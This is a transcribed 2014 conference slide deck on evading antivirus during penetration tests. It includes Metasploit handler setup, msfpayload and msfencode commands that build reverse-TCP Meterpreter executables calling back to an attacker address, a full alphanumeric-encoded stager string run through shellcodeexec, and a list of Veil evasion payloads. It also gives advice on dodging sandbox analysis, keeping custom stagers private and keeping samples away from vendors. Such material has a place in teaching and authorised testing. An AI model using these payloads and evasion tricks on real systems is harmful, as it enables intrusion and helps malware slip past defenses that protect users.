This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.

1. Anti-Virus Evasion Deuce
January 3, 2014
Joe Testa

2. Anti-Virus Got Better




Last January I gave a talk on AV evasion.
I showed how to craft a custom Meterpreter
payload.
Some AV products catch that now!
This presentation shows how to get back in
business.

3. Anti-Virus Got Better



A lot of built-in exploits don't work anymore
because of AV.
You now have to re-write exploits yourself.
Example: unprotected Tomcat installations can
be taken over with the tomcat_mgr_deploy
module.

Without AV, you normally get SYSTEM or root.

With AV, you get disappointment.

4. Goals



Aside from bypassing AV for software exploits,
pentesters need a way to conduct social
engineering.
Ideally, we would like a reliable way to generate
EXE files that run Meterpreter when the user is
tricked.
You can write your own custom code, but then
how do you safely and reliably steal hashes,
hijack tokens, etc?

5. Payload Overview



Usually, the EXE doesn't contain Meterpreter
itself.
Its a stager, whose only job is to connect back
to your Metasploit server and execute what it
returns.
For the last two years, pretty much all the
Metasploit stagers get caught, no matter how
much you encode them.

6. Payload Server

The server is set up with:
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

7. IDS/IPS Evasion


An interesting trick to confuse network IDS/IPS
is to encode the payload as it travels over the
network.
One way is to set StageEncoder on the server.



You can use shikata_ga_nai, etc.
Last I checked, this is very slow!
Another way is to use the
windows/meterpreter/reverse_tcp_rc4 payload.

You set the RC4 key to encrypt communications.

8. Simple Payloads

The most basic way to create an EXE is like
this:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4
LPORT=443 X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"1.2.3.4", "LPORT"=>"443"}
$ ls -l payload.exe
-rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe
$ file payload.exe
payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows

9. Simple Payloads

Up until August 2011, you could bypass AV by
encoding like so:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 R |
msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)

10. Simple Payloads

Last year I talked about shellcodeexec.


https://github.com/inquisb/shellcodeexec
The punchline is that it takes alphanumericencoded shellcode, stuffs it into memory, and
executes it:
C:Documents and Settingsroot>sce.exe PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkP
RvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWq
ZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc
1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT
45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV
9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIo
jumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p

11. Formerly Good Payload

Here's how the alphanumeric shellcode is
created:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=1.2.3.4 R | msfencode -a x86 -e x86/alpha_mixed
-t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsP
nizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJa
xOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1
yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNk
f8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJ
nkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPh
q9K0BK30iozuF0f0pPf03pbpSpf03XIz4OYOYpIoKeLWPj7uE85Q7rWswtphvbWpdQ
slNi8fCZB0cfPWrHoiOURTcQKOXUK5YP0tflIorn5XrUZLCXzPMeORsfIoN5qz30qz
s4cf67ax32JyyXsoIoYELKWFSZQP0huPb0UPWpcfbJePe8BxOTbs8eIoiEmCbs3Zc0
Bv3crwbHER9I8HqOkOZuva8CtiJfLEKFrUjLXCAA

12. Formerly Good Payload

Microsoft Security Essentials catches this!

13. Better Payloads

There is a tool called pyinjector which reimplements the essentials of shellcodeexec in
Python.



Creates a writeable and executable memory buffer,
stuffs code into it, executes it.
You use pyinstaller (http://www.pyinstaller.org/)
to create an EXE.
Available at:
https://www.trustedsec.com/files/pyinjector.zip

14. Better Payloads

There is a tool called Hyperion which encrypts
an EXE with AES-128.


The output EXE brute-forces part of the key on
startup.


http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip
This prevents AV from extracting the key and
decrypting the binary.
The stub code for decryption is static!

It is open source though...

15. Best Payloads

The Veil project is a toolkit for creating
payloads that evade AV.



https://www.veil-evasion.com/
It is a relatively new project, but is actively
maintained and developed.
Currently has 22 payloads.

16. Best Payloads
Current Veil payloads:
c/meterpreter/rev_tcp
c/meterpreter/rev_tcp_service
c/shellcode_inject/virtual
c/shellcode_inject/void
cs/meterpreter/rev_tcp
cs/shellcode_inject/base64_substitution
cs/shellcode_inject/virtual
native/Hyperion
native/backdoor_factory
native/pe_scrambler
powershell/shellcode_inject/download_virtual
powershell/shellcode_inject/psexec_virtual
powershell/shellcode_inject/virtual
python/meterpreter/rev_http_contained
python/meterpreter/rev_https_contained
python/meterpreter/rev_tcp
python/shellcode_inject/aes_encrypt
python/shellcode_inject/arc_encrypt
python/shellcode_inject/base64_substitution
python/shellcode_inject/des_encrypt
python/shellcode_inject/flat
python/shellcode_inject/letter_substitution

17. Best Payloads

Veil and others seem very useful, but being
open source is a bit of a weakness when it
comes to AV evasion.



This is the same problem that Metasploit has.
Nothing beats writing something yourself!
Best method is to take what's out there,
customize it, and keep it private.

18. Best Payloads


A blog post on the Veil homepage pointed to
information on how to make your own
Meterpreter stager.
With shellcodeexec, the idea was to launch the
generated stager to connect to the server,
download Meterpreter, and execute it.


shellcodeexec → alphanumeric-encoded stager → Meterpreter
Why not write your own stager from scratch?

19. Best Payloads

Someone showed how to write your own
windows/meterpreter/reverse_tcp equivalent.



https://github.com/rsmudge/metasploit-loader
Basically, you open a TCP connection to the
Metasploit server, throw the bytes returned into
an executable buffer.
Prepend the buffer with a ”mov edi, socket_id”
instruction, and jump to it.

Meterpreter will then use the existing TCP session.

20. Best Payloads



How do you customize it?
One of the Metasploit developers mentioned
that AV puts new binaries into a sandbox for
the first N seconds.
Do innocent things like read the registry, read
some config files, compute digits of pi, etc.

Don't sleep to run down the clock!

21. VirusTotal


VirusTotal (http://www.virustotal.com/) lets you
upload binaries to be scanned by 46 AV
products.
Its common knowledge that they pass on
samples to AV vendors.


They know malware authors use it.
Your target can pull down a signature in as little
as one hour.

22. VirusTotal

vt-notify (https://github.com/mubix/vt-notify)
uses the VirusTotal's API to check the SHA-1
hash of your payload.


If you don't get your own API key, it uses a
built-in one.


Its been incorporated into Veil.
This probably tips them off that its malware!
Actually... this functionality as a whole was
probably designed as a trap!

23. Building an AV Lab



The best way to check your payload is by
building your own AV lab.
VirusTotal has 46 products, but how many
corporate environments use ”Kingsoft AV”?
Symantec and McAfee seem to have the
overwhelming market share.

Maybe throw in Kaspersky for good measure too...

24. Building an AV Lab


MSDN Operating Systems subscription is $700
for 1 year.
Symantec Small Business Edition costs $60 for
a 3 year subscription for 1 endpoint.

McAfee SaaS Endpoint Protection costs $52.

Make sure the AV products don't phone home!

25. Building an AV Lab



I'm now actively building this lab.
Once its set up, I'm going to evaluate all these
evasion tools.
If anyone wants to test some payloads, just let
me know!

26. Conclusion



To be a good pentester, you need to know how
to bypass AV.
Many built-in Metasploit modules no longer
work. You have to re-write some or find
alternatives.
The success of your engagement can entirely
depend upon how well you can adapt.

Being a programmer is extremely valuable!